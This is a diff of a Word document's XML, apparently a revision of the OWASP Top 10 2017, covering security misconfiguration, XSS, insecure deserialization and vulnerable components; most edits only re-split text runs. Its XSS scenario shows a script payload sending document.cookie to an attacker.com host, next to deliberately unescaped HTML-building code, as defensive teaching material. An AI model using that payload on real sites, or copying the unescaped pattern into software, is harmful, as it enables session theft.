-        <w:t>of date? (see A9:2017 Using Components with Known Vulnerabilities)</w:t>
+        <w:t>Is any of your software out of date? (see A9:2017 Using Components with Known Vulnerabilities)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8842,10 +8445,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The primary recommendations are to establish all of the foll</w:t>
-      </w:r>
-      <w:r>
-        <w:t>owing:</w:t>
+        <w:t>The primary recommendations are to establish all of the following:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8857,10 +8457,13 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with different credentials used in each environ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ment). This process should be automated to minimize the effort required to setup a new secure environment.</w:t>
+        <w:t>A repeatable hardening process that makes it fast and easy t</w:t>
+      </w:r>
+      <w:r>
+        <w:t>o deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with different credentials used in each environment). This process should be automated to minimize the effort requ</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ired to setup a new secure environment.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8884,10 +8487,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>A process to tri</w:t>
-      </w:r>
-      <w:r>
-        <w:t>age and deploy all updates and patches in a timely manner to each deployed environment. This process needs to include all frameworks, dependencies, components, and libraries (see A9:2017 Using Components with Known Vulnerabilities). </w:t>
+        <w:t>A process to triage and deploy all updates and patches in a timely manner to each d</w:t>
+      </w:r>
+      <w:r>
+        <w:t>eployed environment. This process needs to include all frameworks, dependencies, components, and libraries (see A9:2017 Using Components with Known Vulnerabilities). </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8900,10 +8503,10 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>A strong application a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rchitecture that provides effective, secure separation between components, with segmentation, containerization, or cloud security groups (ACLs). </w:t>
+        <w:t>A strong application architecture that provides effective, secure separation between comp</w:t>
+      </w:r>
+      <w:r>
+        <w:t>onents, with segmentation, containerization, or cloud security groups (ACLs). </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8925,10 +8528,7 @@
       <w:bookmarkStart w:id="73" w:name="example-attack-scenarios-5"/>
       <w:bookmarkEnd w:id="73"/>
       <w:r>
-        <w:t>Examp</w:t>
-      </w:r>
-      <w:r>
-        <w:t>le Attack Scenarios</w:t>
+        <w:t>Example Attack Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8942,7 +8542,10 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t>: The app server admin console is automatically installed and not removed. Default accounts aren't changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</w:t>
+        <w:t>: The app server admin console is au</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tomatically installed and not removed. Default accounts aren't changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8953,19 +8556,13 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Scena</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>rio #2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: Directory listing is not disabled on your server. An attacker discovers they can simply list directories to find file. The attacker finds and downloads your compiled Java classes, which they decompile and reverse engineer to get your custom code. A</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ttacker then finds a serious access control flaw in your app.</w:t>
+        <w:t>Scenario #2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Directory listing is not disabled on your server. An attacker discovers they can simply list directories to find file. The attacker finds and downloads your compiled Java classes, which they decompile and reverse engineer to get your custom code. Attacke</w:t>
+      </w:r>
+      <w:r>
+        <w:t>r then finds a serious access control flaw in your app.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8993,10 +8590,10 @@
         <w:t>Scenario #4</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>App server comes with sample apps that are not removed from your production server. These sample apps have known security flaws attackers use to compromise your server.</w:t>
+        <w:t>: App se</w:t>
+      </w:r>
+      <w:r>
+        <w:t>rver comes with sample apps that are not removed from your production server. These sample apps have known security flaws attackers use to compromise your server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9010,10 +8607,10 @@
         <w:t>Scenario #5</w:t>
       </w:r>
       <w:r>
-        <w:t>: The default configuration or a copied old one activates old vulnerable pro</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tocol versions or options that can be misused by an attacker or malware.</w:t>
+        <w:t xml:space="preserve">: The default configuration or a copied old one activates old vulnerable protocol </w:t>
+      </w:r>
+      <w:r>
+        <w:t>versions or options that can be misused by an attacker or malware.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9082,13 +8679,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>ASVS requirements areas for Security Configurati</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>on (V11 and V19)</w:t>
+          <w:t>ASVS requirements areas for Security Configuration (V1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>1 and V19)</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -9161,7 +8758,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="77" w:name="a72017-cross-site-scripting-xss"/>
-      <w:bookmarkStart w:id="78" w:name="_Toc496378426"/>
+      <w:bookmarkStart w:id="78" w:name="_Toc496437904"/>
       <w:bookmarkEnd w:id="77"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -9296,10 +8893,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thir</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ds of all applications.Automated tools can find some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET.</w:t>
+              <w:t>XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications.Automated tools can fin</w:t>
+            </w:r>
+            <w:r>
+              <w:t>d some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9312,10 +8909,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">The impact of XSS is moderate for reflected and DOM XSS, and severe for stored XSS, with remote code </w:t>
-            </w:r>
-            <w:r>
-              <w:t>execution on the victim's browser, such as stealing credentials, sessions, or delivering malware to the victim.</w:t>
+              <w:t>The impact of XSS is moderate for reflected and DOM XSS, and severe for stored XSS, with remote code execution on the victim's browser, such as ste</w:t>
+            </w:r>
+            <w:r>
+              <w:t>aling credentials, sessions, or delivering malware to the victim.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9354,10 +8951,10 @@
         <w:t>Reflected XSS</w:t>
       </w:r>
       <w:r>
-        <w:t>: Your app or API includes unvalidated an</w:t>
-      </w:r>
-      <w:r>
-        <w:t>d unescaped user input as part of HTML output or there is no content security policy (</w:t>
+        <w:t xml:space="preserve">: Your app or API includes unvalidated and unescaped user input as part of HTML output </w:t>
+      </w:r>
+      <w:r>
+        <w:t>or there is no content security policy (</w:t>
       </w:r>
       <w:hyperlink r:id="rId114">
         <w:r>
@@ -9368,10 +8965,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>) header. A successful attack can allow the attacker to execute arbitrary HTML and JavaScrip</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t in the victim’s browser. Typically the user will need to interact with a link, or some other attacker controlled page, such as a watering hole attack, malvertizing, or similar.</w:t>
+        <w:t xml:space="preserve">) header. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically the user </w:t>
+      </w:r>
+      <w:r>
+        <w:t>will need to interact with a link, or some other attacker controlled page, such as a watering hole attack, malvertizing, or similar.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9389,10 +8986,10 @@
         <w:t>Stored XSS</w:t>
       </w:r>
       <w:r>
-        <w:t>: Your app or API stores unsanitized user input that is viewed at a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> later time by another user or an administrator. Stored XSS is often considered a high or critical risk.</w:t>
+        <w:t>: Your app or API stores unsanitized user input that is viewed at a later time by another user or an administrato</w:t>
+      </w:r>
+      <w:r>
+        <w:t>r. Stored XSS is often considered a high or critical risk.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9410,10 +9007,10 @@
         <w:t>DOM XSS</w:t>
       </w:r>
       <w:r>
-        <w:t>: JavaScript frameworks, single page apps, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ide</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs.</w:t>
+        <w:t>: JavaScript frameworks, single page apps, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, you would avoid sending attacker-control</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lable data to unsafe JavaScript APIs.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9421,7 +9018,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Typical XSS attacks include session stealing, account takeover, MFA bypass, DIV replacement or defacement (such as trojan login DIVs), attacks against the user's browser such as malicious software downloads, key logging, and other client side attacks.</w:t>
+        <w:t>Typical XSS attacks include session stealing, account takeover, MFA bypass, DIV replacement or defacement (such as trojan login DIVs), attacks against the user's browser such as malicious software downloads, key loggin</w:t>
+      </w:r>
+      <w:r>
+        <w:t>g, and other client side attacks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9431,10 +9031,7 @@
       <w:bookmarkStart w:id="80" w:name="how-do-i-prevent-this-5"/>
       <w:bookmarkEnd w:id="80"/>
       <w:r>
-        <w:t xml:space="preserve">How </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Do I Prevent This?</w:t>
+        <w:t>How Do I Prevent This?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9466,10 +9063,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Escaping untrusted HTTP request data based on the contex</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The </w:t>
+        <w:t>Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The </w:t>
       </w:r>
       <w:hyperlink r:id="rId115">
         <w:r>
@@ -9492,10 +9086,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Applying context sensitive encoding when modifying the browser document on the client side acts against DOM XSS. When this cannot be avoided, similar context sensitive escaping techniques can be applie</w:t>
-      </w:r>
-      <w:r>
-        <w:t>d to browser APIs as described in the </w:t>
+        <w:t>Applying context sensitive encoding when modifying the browser document on the client side acts against DOM XSS. When this cannot be avoided, sim</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ilar context sensitive escaping techniques can be applied to browser APIs as described in the </w:t>
       </w:r>
       <w:hyperlink r:id="rId116">
         <w:r>
@@ -9525,20 +9119,14 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>Co</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ntent Security Policy (CSP)</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> is a defense in depth mitigating control against XSS, assuming no other vulnerabilities exist that would allow placing malicious code via local file include such as path traversal overwrites, or vulnerable libraries in permitted</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> sources, such as content delivery network or local libraries. </w:t>
+          <w:t>Content Security Policy (CSP)</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> is a defense in depth mitigating control against XSS, assuming no other vulnerabilities exist that would allow placing malicious code via local file include such as path tr</w:t>
+      </w:r>
+      <w:r>
+        <w:t>aversal overwrites, or vulnerable libraries in permitted sources, such as content delivery network or local libraries. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9563,7 +9151,10 @@
         <w:t>Scenario 1</w:t>
       </w:r>
       <w:r>
-        <w:t>: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:</w:t>
+        <w:t>: The application uses untrusted data in the construction of the following HTML snippet without valida</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tion or escaping:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9574,32 +9165,32 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">   (String) page += "&lt;input name='cred</w:t>
-      </w:r>
+        <w:t xml:space="preserve">   (String) page += "&lt;input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'&gt;";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The attacker modifies the 'CC’ parameter in the browser to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t>itcard' type='TEXT' value='" + request.getParameter("CC") + "'&gt;";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The attacker modifies the 'CC’ parameter in the browser to:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
+        <w:t>&gt;&lt;script&gt;document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t>&gt;&lt;script&gt;document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie&lt;/script&gt;'.</w:t>
+        <w:t>='+document.cookie&lt;/script&gt;'.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9607,10 +9198,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>This attack causes the vic</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.</w:t>
+        <w:t>This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9618,7 +9206,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Note that attackers can use XSS to defeat any automated CSRF defense the application might employ.</w:t>
+        <w:t xml:space="preserve">Note that attackers can use XSS to defeat any automated CSRF defense the application </w:t>
+      </w:r>
+      <w:r>
+        <w:t>might employ.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9688,7 +9279,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Application Security Verification Standard - V5</w:t>
+          <w:t>OWASP Application Security Verification Standard</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> - V5</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -9722,13 +9319,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Testing Gui</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>de: Testing for Stored XSS</w:t>
+          <w:t>OWASP Testing Guide: Testing for Stored XSS</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -9849,7 +9440,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="85" w:name="a82017-insecure-deserialization"/>
-      <w:bookmarkStart w:id="86" w:name="_Toc496378427"/>
+      <w:bookmarkStart w:id="86" w:name="_Toc496437905"/>
       <w:bookmarkEnd w:id="85"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -9943,10 +9534,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Exp</w:t>
-            </w:r>
-            <w:r>
-              <w:t>loitability 1</w:t>
+              <w:t>Exploitability 1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9998,10 +9586,10 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve"> and not on quantifiable data. Some tools can discover deserialization flaws, but human assistance is frequently needed to validate the problem. It is expected that prevalenc</w:t>
-            </w:r>
-            <w:r>
-              <w:t>e data for deserialization flaws will increase as tooling is developed to help identify and address it. </w:t>
+              <w:t xml:space="preserve"> and not on quantifiable data. Some tools can discover deserialization flaws, but human assistance is frequently needed to validate the problem. It is expected that preval</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ence data for deserialization flaws will increase as tooling is developed to help identify and address it. </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10027,10 +9615,7 @@
       <w:bookmarkStart w:id="87" w:name="am-i-vulnerable-to-insecure-deserializat"/>
       <w:bookmarkEnd w:id="87"/>
       <w:r>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m I Vulnerable to Insecure Deserialization?</w:t>
+        <w:t>Am I Vulnerable to Insecure Deserialization?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10038,10 +9623,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Distributed applications or those that need to store state on clients or the filesystem may be using object serialization. Distributed applications with public listeners or applications that rely on the client ma</w:t>
-      </w:r>
-      <w:r>
-        <w:t>intaining state, are likely to allow for tampering of serialized data. This attack is possible with binary formats like Java Serialization or text based formats like Json.Net. Applications and APIs will be vulnerable if the when:</w:t>
+        <w:t>Distributed applications or those that need to store state on clients or the filesystem may be using object serialization. Distributed applications with public listeners or applications that rely on the client</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> maintaining state, are likely to allow for tampering of serialized data. This attack is possible with binary formats like Java Serialization or text based formats like Json.Net. Applications and APIs will be vulnerable if the when:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10092,7 +9677,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Security state sent to an untrusted client without some form of integrity control is likely vulnerable to deserialization.</w:t>
+        <w:t xml:space="preserve">Security state sent </w:t>
+      </w:r>
+      <w:r>
+        <w:t>to an untrusted client without some form of integrity control is likely vulnerable to deserialization.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10110,10 +9698,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The only safe architectural pattern is to not accept serialized objects from untrusted sources or to use seria</w:t>
-      </w:r>
-      <w:r>
-        <w:t>lization mediums that only permit primitive data types.</w:t>
+        <w:t>The only safe architectural pattern is to not accept serialized objects from untrusted sources or to use serialization mediums tha</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t only permit primitive data types.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10145,10 +9733,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Enforce strict type constraints during deserialization</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> before object creation; typically code is expecting a definable set of classes. Bypasses to this technique have been demonstrated.</w:t>
+        <w:t>Enforce strict type constraints during deserialization before object creat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ion; typically code is expecting a definable set of classes. Bypasses to this technique have been demonstrated.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10172,10 +9760,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Log dese</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</w:t>
+        <w:t>Log deserialization exceptio</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ns and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10200,10 +9788,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Monitor des</w:t>
-      </w:r>
-      <w:r>
-        <w:t>erialization, alerting if a user deserializes constantly.</w:t>
+        <w:t>Monitor deserialization, alerti</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ng if a user deserializes constantly.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10227,10 +9815,10 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t>: A React app calls a set of Spring Boot microservices. Being functional programmers, they tried to ensure that their code is immutable. The solution they came u</w:t>
-      </w:r>
-      <w:r>
-        <w:t>p with is serializing user state and passing it back and forth with each request. An attacker notices the "R00" Java object signature, and uses the Java Serial Killer tool to gain remote code execution on the application server.</w:t>
+        <w:t>: A React app calls a set of Spring Boot microservices. Being functional programmers, they tried to ensure that their code is immutable. The solution they came up with is serializin</w:t>
+      </w:r>
+      <w:r>
+        <w:t>g user state and passing it back and forth with each request. An attacker notices the "R00" Java object signature, and uses the Java Serial Killer tool to gain remote code execution on the application server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10244,10 +9832,10 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t>: A PHP forum us</w:t>
-      </w:r>
-      <w:r>
-        <w:t>es PHP object serialization to save a "super" cookie, containing the user's user ID, role, password hash, and other state:</w:t>
+        <w:t>: A PHP forum uses PHP object serial</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ization to save a "super" cookie, containing the user's user ID, role, password hash, and other state:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10266,10 +9854,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>An attacker changes the serialized obje</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ct to give themselves admin privileges:</w:t>
+        <w:t>An attacker changes the serialized object to give themselve</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s admin privileges:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10316,13 +9904,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Deserialization Cheat S</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>heet</w:t>
+          <w:t>OWASP Deserialization Cheat Sheet</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -10373,13 +9955,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP AppSecEU 2016: Surviving the Java Des</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>erialization Apocalypse</w:t>
+          <w:t>OWASP AppSecEU 2016: Surviving the Java Deserialization Apocalypse</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -10440,7 +10016,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>https://github.com/mbechler/marshalsec</w:t>
+          <w:t>h</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>ttps://github.com/mbechler/marshalsec</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -10449,7 +10031,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="93" w:name="a92017-using-components-with-known-vulne"/>
-      <w:bookmarkStart w:id="94" w:name="_Toc496378428"/>
+      <w:bookmarkStart w:id="94" w:name="_Toc496437906"/>
       <w:bookmarkEnd w:id="93"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -10481,10 +10063,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Threat agents/Att</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ack vectors</w:t>
+              <w:t>Threat agents/Attack vectors</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10574,7 +10153,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>While it is easy to find already-written exploits for many known vulnerabilities, other vulnerabilities require concentrated effort to develop a custom exploit.</w:t>
+              <w:t>While it is easy to find already-written exploits for many known</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> vulnerabilities, other vulnerabilities require concentrated effort to develop a custom exploit.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10587,13 +10169,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Prevalence</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> of this issue is very widespread. Component-heavy development patterns can lead to development teams not even understanding which components they use in their application or API, much less keeping them up to date. This issue is detectable by the use of sc</w:t>
-            </w:r>
-            <w:r>
-              <w:t>anners such as retire.js and header inspection, but verifying if it is exploitable requires an attack of some description.</w:t>
+              <w:t>Prevalence of this issue is very widespread. Component-heavy development patterns can lead to development teams not even understanding which components they us</w:t>
+            </w:r>
+            <w:r>
+              <w:t>e in their application or API, much less keeping them up to date. This issue is detectable by the use of scanners such as retire.js and header inspection, but verifying if it is exploitable requires an attack of some description.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10606,10 +10185,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>While some known vulnerabilities lead to only minor impacts, some of the largest breaches to date have relied on exploiting known vulnerabilities in components. Depending on the assets you are protecting, perhaps this risk should be at the top of your list</w:t>
-            </w:r>
-            <w:r>
-              <w:t>.</w:t>
+              <w:t>While some known vulnerabi</w:t>
+            </w:r>
+            <w:r>
+              <w:t>lities lead to only minor impacts, some of the largest breaches to date have relied on exploiting known vulnerabilities in components. Depending on the assets you are protecting, perhaps this risk should be at the top of your list.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10622,7 +10201,10 @@
       <w:bookmarkStart w:id="95" w:name="am-i-vulnerable-to-known-vulnerabilities"/>
       <w:bookmarkEnd w:id="95"/>
       <w:r>
-        <w:t>Am I Vulnerable to Known Vulnerabilities?</w:t>
+        <w:t>Am I Vulnerable to Know</w:t>
+      </w:r>
+      <w:r>
+        <w:t>n Vulnerabilities?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10882,13 +10464,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Components typi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>cally run with the same privileges as the application itself, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g. coding error) or intentional (e.g. backdoor in component). Some example exploitable component vulnerabi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>lities discovered are:</w:t>
+        <w:t>Components typically run with the same privileges as the application itself, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g. coding error) or intentional (e.g. backdoor in component). Some example exploitable comp</w:t>
+      </w:r>
+      <w:r>
+        <w:t>onent vulnerabilities discovered are:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10908,10 +10487,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>, a Struts 2 remote code execution vulnerability that enables execution of arbitrary code on the server, has been blamed for significant bre</w:t>
-      </w:r>
-      <w:r>
-        <w:t>aches.</w:t>
+        <w:t xml:space="preserve">, a Struts 2 remote code execution vulnerability that enables execution of arbitrary code on the server, has been blamed for </w:t>
+      </w:r>
+      <w:r>
+        <w:t>significant breaches.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10945,7 +10524,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>.</w:t>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10960,13 +10539,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>Shodan</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> IoT search engine</w:t>
+          <w:t>Shodan IoT search engine</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -11016,7 +10589,10 @@
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
       <w:r>
-        <w:instrText xml:space="preserve"> HYPERLINK \h </w:instrText>
+        <w:instrText xml:space="preserve"> HYPER</w:instrText>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve">LINK \h </w:instrText>
       </w:r>
       <w:r>
         <w:fldChar w:fldCharType="separate"/>
